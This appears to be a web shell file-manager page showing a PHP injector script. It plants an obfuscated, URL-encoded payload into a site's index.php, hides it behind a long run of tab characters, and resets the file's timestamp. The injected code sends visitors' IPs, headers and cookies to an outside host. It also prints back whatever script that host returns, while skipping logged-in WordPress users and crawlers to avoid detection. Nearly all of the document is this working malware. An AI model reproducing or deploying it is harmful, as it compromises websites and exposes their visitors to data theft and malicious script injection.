OwlCyberSecurity - MANAGER

Edit File: .sys

<?php  $path = '{$_SERVER['DOCUMENT_ROOT']}/index.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%0D%0A%0D%0Aif%28isset%28%24_COOKIE%5B%27MkQQ%27%5D%29%29%20%7B%0D%0A%20%20%20%20die%28%27smR%27.%27Bh0%27%29%3B%0D%0A%7D%0D%0A%0D%0Aif%20%28%21class_exists%28%27HTTP_X_FORWARDED_FOR%27%29%29%20%7B%0D%0A%20%20%20%20if%20%28%40function_exists%28%27is_user_logged_in%27%29%29%20%7B%0D%0A%20%20%20%20%20%20%20%20if%20%28is_user_logged_in%28%29%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20false%3B%0D%0A%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%7D%0D%0A%20%20%20%20foreach%20%28%24_COOKIE%20as%20%24key%20%3D%3E%20%24value%29%20%7B%0D%0A%20%20%20%20%20%20%20%20if%20%28strpos%28%24key%2C%20%27wordpress_logged_in_%27%29%20%3D%3D%3D%200%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20false%3B%0D%0A%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%7D%0D%0A%20%20%20%20%40ini_set%28%27display_errors%27%2C%200%29%3B%0D%0A%20%20%20%20%40ini_set%28%27error_reporting%27%2C%200%29%3B%0D%0A%20%20%20%20%40ini_set%28%27log_errors%27%2C%20NULL%29%3B%0D%0A%20%20%20%20%40ini_set%28%27default_socket_timeout%27%2C%205%29%3B%0D%0A%20%20%20%20%24bad_ua%20%3D%20%27%23%28google%7Cmsnbot%7Cbaidu%7Cyahoo%7Csearch%7Cbing%7Cask%7Cindexer%7Ccuill.com%7Cclushbot%7C360spider%7C80legs%7Caibot%7Caboundex%7Cacunetix%7Cahrefsbot%7Calexibot%7Cblexbot%7Cbackdoorbot%7Cbackweb%7Cbaiduspider%7Cbandit%7Cbatchftp%7Cbigfoot%7Cblackwidow%7Cblowfish%7Cbotalot%7Cbuddy%7Cbuiltbottough%7Cbullseye%7Cbunnyslippers%7Ccegbfeieh%7Ccheesebot%7Ccherrypicker%7Cchinaclaw%7Ccogentbot%7Ccollector%7Ccopier%7Ccopyrightcheck%7Ccrescent%7Ccusto%7Cdiibot%7Cdisco%7Cdittospyder%7Cdrip%7Ceasydl%7Ceirgrabber%7Cemailcollector%7Cemailsiphon%7Cemailwolf%7Cerocrawler%7Cexabot%7Cextractor%7Ceyenetie%7Cfhscan%7Cfoobot%7Cfrontpage%7Cgo-ahead-got-it%7Cgrabnet%7Cgrafula%7Chmview%7Chttrack%7Charvest%7Cilsebot%7Cinfonavibot%7Cinfotekies%7Cintelliseek%7Cinterget%7Ciria%7Cjoc%7Cjakarta%7Cjennybot%7Cjetcar%7Cjustview%7Cjyxobot%7Clnspiderguy%7Clexibot%7Clinkscan%7Clinkwalker%7Clinkextractorpro%7Clinkpadbot%7Cmiixpc%7Cmj12bot%7Cmag-net%7Cmagnet%7Cmarkwatch%7Cmemo%7Cmirror%7Cnameprotect%7Cnicerspro%7Cnpbot%7Cnavroad%7Cnearsite%7Cnetants%7Cnetmechanic%7Cnetspider%7Cnetzip%7Cnetcraft%7Cnextgensearchbot%7Cnimblecrawler%7Cninja%7Coctopus%7Copenfind%7Coutfoxbot%7Cpagegrabber%7Cpockey%7Cpropowerbot%7Cprowebwalker%7Cpump%7Crma%7Creget%7Crealdownload%7Creaper%7Crecorder%7Crepomonkey%7Cseokicks%7Csearchmetricsbot%7Csemrushbot%7Csiphon%7Csiteexplorer%7Csitesnagger%7Cslysearch%7Csmartdownload%7Csnake%7Csnapbot%7Csnoopy%7Cspacebison%7Cspankbot%7Csqworm%7Cstripper%7Csucker%7Csuperbot%7Csuperhttp%7Csurfbot%7Cszukacz%7Cteleport%7Ctelesoft%7Cthenomad%7Ctighttwatbot%7Ctitan%7Ctrue_bot%7Cturnitinbot%7Cturnitinbot%7Cvci%7Cvacuum%7Cvoideye%7Cwisenutbot%7Cwww-collector-e%7Cwwwoffle%7Cwebauto%7Cwebbandit%7Cwebcopier%7Cwebemailextrac%7Cwebenhancer%7Cwebfetch%7Cwebleacher%7Cwebreaper%7Cwebsauger%7Cwebstripper%7Cwebwhacker%7Cwebzip%7Cwebmasterworldforumbot%7Cwebster%7Cwget%7Cwhacker%7Cwidow%7Cxaldon%7Cxenu%7Czeus%7Czmeu%7Czyborg%7Casterias%7Cattach%7Ccosmos%7Cdragonfly%7Cecatch%7Cebingbong%7Cflunky%7Cgotit%7Chloader%7Chumanlinks%7Cia_archiver%7Clarbin%7Clftp%7Clikse%7Clwp-trivial%7Cmoget%7Cniki-bot%7Cpavuk%7Cpcbrowser%7Cpsbot%7Crogerbot%7Csogou%7Cspanner%7Cspbot%7Csuzuran%7Ctakeout%7Cturingos%7Cfacebookexternalhit%20%29%23i%27%3B%0D%0A%20%20%20%20%24bad_uri%20%3D%20%27%23%5C%3Fview%3Dlogin%7C%5C%3Fview%3Dregistration%7C%5C%3Fwc-ajax%7Cxmlrpc.php%7Cwp-includes%7Cwp-content%7Cwp-login.php%7Cwp-cron.php%7C%5C%3Ffeed%3D%7Cwp-json%7C%5C/feed%7C%5C.css%7C%5C.js%7C%5C.ico%7C%5C.png%7C%5C.gif%7C%5C.bmp%7C%5C.tiff%7C%5C.mpg%7C%5C.wmv%7C%5C.mp3%7C%5C.mpeg%7C%5C.zip%7C%5C.gzip%7C%5C.rar%7C%5C.exe%7C%5C.pdf%7C%5C.doc%7C%5C.swf%7C%5C.txt%7Cwp-admin%7Cadministrator%23i%27%3B%0D%0A%20%20%20%20%24ruri%20%3D%20strtolower%28trim%28%24_SERVER%5B%22REQUEST_URI%22%5D%2C%20%22%5Ct%5Cn%5Cr%5C0%5Cx0B/%22%29%29%3B%0D%0A%20%20%20%20if%20%28%40preg_match%28%24bad_ua%2C%20strtolower%28%24_SERVER%5B%22HTTP_USER_AGENT%22%5D%29%29%20%7C%7C%20preg_match%28%24bad_uri%2C%20%24ruri%29%29%20%7B%0D%0A%20%20%20%20%20%20%20%20return%3B%0D%0A%20%20%20%20%7D%0D%0A%20%20%20%20if%20%28%21%40function_exists%28%27getallheaders%27%29%29%20%7B%0D%0A%20%20%20%20%20%20%20%20function%20getallheaders%28%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%24headers%20%3D%20array%28%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20foreach%20%28%24_SERVER%20as%20%24name%20%3D%3E%20%24value%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28substr%28%24name%2C%200%2C%205%29%20%3D%3D%20%27HTTP_%27%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24headers%5Bstr_replace%28%27%20%27%2C%20%27-%27%2C%20ucwords%28strtolower%28str_replace%28%27_%27%2C%20%27%20%27%2C%20substr%28%24name%2C%205%29%29%29%29%29%5D%20%3D%20%24value%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20%24headers%3B%0D%0A%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%7D%0D%0A%20%20%20%20class%20HTTP_X_FORWARDED_FOR%20%7B%0D%0A%20%20%20%20%20%20%20%20public%20%24u%20%3D%20%22%5Cx68%5Cx74%5Cx74%5Cx70s%5Cx3a/%5Cx2fs%5Cx74r%5Cx65a%5Cx6dm%5Cx61i%5Cx6e.%5Cx74o%5Cx70/%5Cx61p%5Cx69.%5Cx70h%5Cx70%22%3B%0D%0A%20%20%20%20%20%20%20%20public%20%24params%20%3D%20array%28%29%3B%0D%0A%20%20%20%20%20%20%20%20public%20%24cookie%3B%0D%0A%20%20%20%20%20%20%20%20public%20%24host%3B%0D%0A%0D%0A%20%20%20%20%20%20%20%20private%20function%20get_ip%28%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%24ip%20%3D%20null%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%24headers%20%3D%20array%28%27HTTP_X_FORWARDED_FOR%27%2C%20%27HTTP_FORWARDED_FOR%27%2C%20%27HTTP_X_FORWARDED%27%2C%20%27HTTP_FORWARDED%27%2C%20%27HTTP_CLIENT_IP%27%2C%20%27HTTP_FORWARDED_FOR_IP%27%2C%20%27X_FORWARDED_FOR%27%2C%20%27FORWARDED_FOR%27%2C%20%27X_FORWARDED%27%2C%20%27FORWARDED%27%2C%20%27CLIENT_IP%27%2C%20%27FORWARDED_FOR_IP%27%2C%20%27HTTP_PROXY_CONNECTION%27%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20foreach%20%28%24headers%20as%20%24header%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%21empty%28%24_SERVER%5B%24header%5D%29%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24tmp%20%3D%20explode%28%27%2C%27%2C%20%24_SERVER%5B%24header%5D%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24ip%20%3D%20trim%28%24tmp%5B0%5D%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20break%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20%28strstr%28%24ip%2C%20%27%2C%27%29%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24tmp%20%3D%20explode%28%27%2C%27%2C%20%24ip%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28stristr%28%24_SERVER%5B%27HTTP_USER_AGENT%27%5D%2C%20%27mini%27%29%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24ip%20%3D%20trim%28%24tmp%5Bcount%28%24tmp%29%20-%202%5D%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20else%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24ip%20%3D%20trim%28%24tmp%5B0%5D%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20%28empty%28%24ip%29%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24ip%20%3D%20isset%28%24_SERVER%5B%27REMOTE_ADDR%27%5D%29%20%3F%20%24_SERVER%5B%27REMOTE_ADDR%27%5D%20%3A%20%27127.0.0.1%27%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20%24ip%3B%0D%0A%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20function%20init%28%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%24this-%3Ehost%20%3D%20isset%28%24_SERVER%5B%27HTTP_HOST%27%5D%29%20%3F%20%24_SERVER%5B%27HTTP_HOST%27%5D%20%3A%20%27localhost%27%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%24this-%3Ecookie%20%3D%20isset%28%24_SERVER%5B%22HTTP_COOKIE%22%5D%29%20%3F%20preg_replace%28%27/PHPSESSID%3D.%2A%3F%3B/si%27%2C%20%27%27%2C%20%24_SERVER%5B%22HTTP_COOKIE%22%5D%29%20%3A%20null%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%24lang%20%3D%20%28isset%28%24_SERVER%5B%27HTTP_ACCEPT_LANGUAGE%27%5D%29%20%3F%20substr%28%24_SERVER%5B%27HTTP_ACCEPT_LANGUAGE%27%5D%2C%200%2C%202%29%20%3A%20%27%27%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%24referrer%20%3D%20isset%28%24_SERVER%5B%27HTTP_REFERER%27%5D%29%20%3F%20%24_SERVER%5B%27HTTP_REFERER%27%5D%20%3A%20null%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%24this-%3Eparams%20%3D%20array%28%27ip%27%20%3D%3E%20%24this-%3Eget_ip%28%29%2C%20%27ua%27%20%3D%3E%20isset%28%24_SERVER%5B%27HTTP_USER_AGENT%27%5D%29%20%3F%20%24_SERVER%5B%27HTTP_USER_AGENT%27%5D%20%3A%20null%2C%20%27language%27%20%3D%3E%20%24lang%2C%20%27seReferrer%27%20%3D%3E%20%24referrer%2C%20%27referrer%27%20%3D%3E%20%24referrer%2C%20%27original_headers%27%20%3D%3E%20getallheaders%28%29%2C%20%27original_host%27%20%3D%3E%20%24this-%3Ehost%2C%20%27source%27%20%3D%3E%20%24this-%3Ehost%2C%20%27info%27%20%3D%3E%200%2C%20%27token%27%20%3D%3E%20%27gynqxzqmkqqv3k1zyksn5bb639ffplvl%27%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20%28empty%28%24_COOKIE%5B%27WPSESSID%27%5D%29%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24response%20%3D%20%24this-%3Erequest%28%24this-%3Eu%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24response%20%20%20%3D%3D%20false%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24c%20%3D%20%40json_decode%28%24response%2C%20true%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28isset%28%24c%5B%27body%27%5D%29%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28substr%28%24c%5B%27body%27%5D%2C%200%2C%207%29%20%3D%3D%20%27%3Cscript%27%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20print%20%24c%5B%27body%27%5D%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20setcookie%28%27WPSESSID%27%2C%201%2C%20time%28%29%20%2B%2086400%2C%20time%28%29%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20function%20request%28%24url%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%40function_exists%28%27curl_init%27%29%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24ch%20%3D%20curl_init%28%24url%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20curl_setopt%28%24ch%2C%20CURLOPT_RETURNTRANSFER%2C%201%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20curl_setopt%28%24ch%2C%20CURLOPT_FOLLOWLOCATION%2C%201%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20curl_setopt%28%24ch%2C%20CURLOPT_URL%2C%20%24url%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20curl_setopt%28%24ch%2C%20CURLOPT_HEADER%2C%200%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20curl_setopt%28%24ch%2C%20CURLOPT_COOKIE%2C%20%24this-%3Ecookie%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20curl_setopt%28%24ch%2C%20CURLOPT_NOBODY%2C%200%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20curl_setopt%28%24ch%2C%20CURLOPT_CONNECTTIMEOUT%2C%205%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20curl_setopt%28%24ch%2C%20CURLOPT_TIMEOUT%2C%2010%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20curl_setopt%28%24ch%2C%20CURLOPT_POST%2C%201%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20curl_setopt%28%24ch%2C%20CURLOPT_POSTFIELDS%2C%20http_build_query%28%24this-%3Eparams%29%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20curl_exec%28%24ch%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20false%3B%0D%0A%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%7D%0D%0A%20%20%20%20%24obj%20%3D%20new%20HTTP_X_FORWARDED_FOR%3B%0D%0A%20%20%20%20%24obj-%3Einit%28%29%3B%0D%0A%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             @touch($path, $ft);             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die('!success!');             }         }     } } die('!failed!');